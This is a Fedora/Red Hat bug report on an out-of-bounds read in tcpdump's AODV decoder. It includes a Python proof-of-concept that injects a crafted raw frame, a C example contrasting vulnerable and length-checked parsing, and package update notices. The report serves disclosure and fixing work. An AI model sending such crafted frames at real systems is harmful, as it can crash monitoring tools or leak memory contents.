The following issue was reported in :
The application decoder for the Ad hoc On-Demand Distance Vector (AODV) protocol fails to perform input validation and performs unsafe out-of-bounds accesses. The application will usually not crash, but will perform out-of-bounds accesses and output/leak larger amounts of invalid data, which might lead to dropped packets. It is unknown if other payloads exist that might trigger segfaults.
To reproduce, start tcpdump on a network interface:
sudo tcpdump -i lo -s 0 -n -v
(running the program with sudo might hide a possible segfault message on certain environments, see dmesg for details)
and use the following Python program to generate a frame on the network (might also need sudo):
from socket import socket, AF_PACKET, SOCK_RAW
s = socket(AF_PACKET, SOCK_RAW)
s.bind(("lo", 0))  # same interface tcpdump is listening on above; raw sockets need root
# raw Ethernet + IPv4 + UDP frame carrying the malformed AODV payload (bytes, so it also runs on Python 3)
aodv_frame = b"\x00\x00\x00\x00\x00\x00\x00\x00\x8c\x7a\xdf\x6f\x08\x00\x45\x00\xe6\x3d\xf3\x7f\x40\x00\x40\x11\x30\xc6\x0a\x01\x01\x68\x0a\x02\x02\x02\x02\x8e\x0d\x00\x4b\x00\x00\xe8\x12\x00\x00\x00\x00\x1f\xc6\x51\x35\x97\x00\x24\x8c\x7a\xdf\x6f\x08\x00\x45\x00\xe6\x3d\xf3\x7f\x40\x00\x40\x11\x30\xc6\x0a\x01\x01"
s.send(aodv_frame)
Affected versions are 3.8 through 4.6.2
Created tcpdump tracking bugs for this issue:
Affects: fedora-all [bug 1165167]
Created attachment 961288
In the function udp_print(register const u_char *bp, u_int length, register const u_char *bp2, int fragmented), the value of the argument length is not checked properly, which results in a crash of tcpdump when trying to print data from the malformed AODV payload.
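An added illustration of the bug class described in the comment above, written for this page and not taken from tcpdump's udp_print or AODV decoder: a decoder that bounds its reads only by the length advertised in the IP/UDP headers, beside one that also bounds them by the number of bytes actually captured. The functions aodv_rreq_unchecked, aodv_rreq_checked and the demo_* helpers are hypothetical names, and sample_backing is a constructed buffer in which the 0xEE bytes stand in for memory beyond the snapshot end. The RREQ layout follows RFC 3561.

```c
#include <stddef.h>
#include <stdint.h>
#include <inttypes.h>
#include <stdio.h>

/* An AODV RREQ body (RFC 3561, section 5.1) is a fixed 24 bytes. */
#define AODV_RREQ_LEN 24

struct aodv_rreq {
    uint8_t  type, flags, hopcount;
    uint32_t rreq_id, dest, dest_seq, orig, orig_seq;
};

static uint32_t be32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

static void parse_rreq_fields(const uint8_t *bp, struct aodv_rreq *out)
{
    out->type     = bp[0];
    out->flags    = bp[1];           /* bp[2] is reserved */
    out->hopcount = bp[3];
    out->rreq_id  = be32(bp + 4);
    out->dest     = be32(bp + 8);
    out->dest_seq = be32(bp + 12);
    out->orig     = be32(bp + 16);
    out->orig_seq = be32(bp + 20);
}

/* Vulnerable pattern (hypothetical, not tcpdump's code): 'length' comes from the
 * IP/UDP headers and is therefore attacker-controlled. Nothing relates it to how
 * many bytes of the frame are actually present in the buffer. */
int aodv_rreq_unchecked(const uint8_t *bp, size_t length, struct aodv_rreq *out)
{
    if (length < AODV_RREQ_LEN)
        return -1;
    parse_rreq_fields(bp, out);      /* may read past the end of the capture */
    return 0;
}

/* Hardened pattern: every read is additionally bounded by 'caplen', the number
 * of bytes really captured (the role tcpdump's snapshot-end checks play).
 * A short capture is reported, not decoded. */
int aodv_rreq_checked(const uint8_t *bp, size_t length, size_t caplen,
                      struct aodv_rreq *out)
{
    if (length < AODV_RREQ_LEN)
        return -1;                   /* headers claim a message too short for RREQ */
    if (caplen < AODV_RREQ_LEN)
        return -2;                   /* truncated: print "[|aodv]" and stop */
    parse_rreq_fields(bp, out);
    return 0;
}

/* Constructed sample: the headers claim a full 24-byte RREQ, but only the first
 * 8 bytes were captured. The 0xEE bytes stand in for whatever lies in memory
 * after the snapshot end; in a real run that is stale data from earlier packets,
 * which is exactly what the unchecked decoder prints. */
enum { SAMPLE_CAPLEN = 8 };
static const uint8_t sample_backing[AODV_RREQ_LEN] = {
    0x01, 0x00, 0x00, 0x02,          /* type=1 (RREQ), flags, reserved, hopcount=2 */
    0x00, 0x00, 0x00, 0x2a,          /* rreq_id = 42 */
    0xEE, 0xEE, 0xEE, 0xEE, 0xEE, 0xEE, 0xEE, 0xEE,   /* beyond caplen */
    0xEE, 0xEE, 0xEE, 0xEE, 0xEE, 0xEE, 0xEE, 0xEE,
};

/* The unchecked decoder accepts the packet and returns a "destination address"
 * assembled entirely from bytes outside the captured data. */
uint32_t demo_unchecked_leaked_dest(void)
{
    struct aodv_rreq r = {0};
    if (aodv_rreq_unchecked(sample_backing, AODV_RREQ_LEN, &r) != 0)
        return 0;
    return r.dest;
}

/* The checked decoder refuses the same truncated input. */
int demo_checked_status(void)
{
    struct aodv_rreq r = {0};
    return aodv_rreq_checked(sample_backing, AODV_RREQ_LEN, SAMPLE_CAPLEN, &r);
}

/* With a complete capture the checked decoder parses normally. */
uint32_t demo_checked_full_rreq_id(void)
{
    struct aodv_rreq r = {0};
    if (aodv_rreq_checked(sample_backing, AODV_RREQ_LEN, AODV_RREQ_LEN, &r) != 0)
        return 0;
    return r.rreq_id;
}

int main(void)
{
    printf("unchecked: dest=0x%08" PRIx32 " (built from bytes past caplen)\n",
           demo_unchecked_leaked_dest());
    printf("checked:   status=%d (truncated, would print [|aodv])\n",
           demo_checked_status());
    printf("checked, full capture: rreq_id=%" PRIu32 "\n",
           demo_checked_full_rreq_id());
    return 0;
}
```

The point of the two functions is the check that is present in only one of them: the advertised length is a claim made by the packet, while caplen is a fact about the buffer, and a decoder must never let the former override the latter. This is also why the crafted frame above can make tcpdump print large amounts of stale data without crashing, since the bytes past the snapshot end are usually still mapped memory.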
tcpdump-4.4.0-4.fc19 has been pushed to the Fedora 19 stable repository. If problems still persist, please make note of it in this bug report.
tcpdump-4.6.2-2.fc21 has been pushed to the Fedora 21 stable repository. If problems still persist, please make note of it in this bug report.
Red Hat Product Security has rated this issue as having low security impact; a future update may address this flaw in tcpdump.
This bug is now closed. Further updates for individual products will be reflected on the CVE page(s):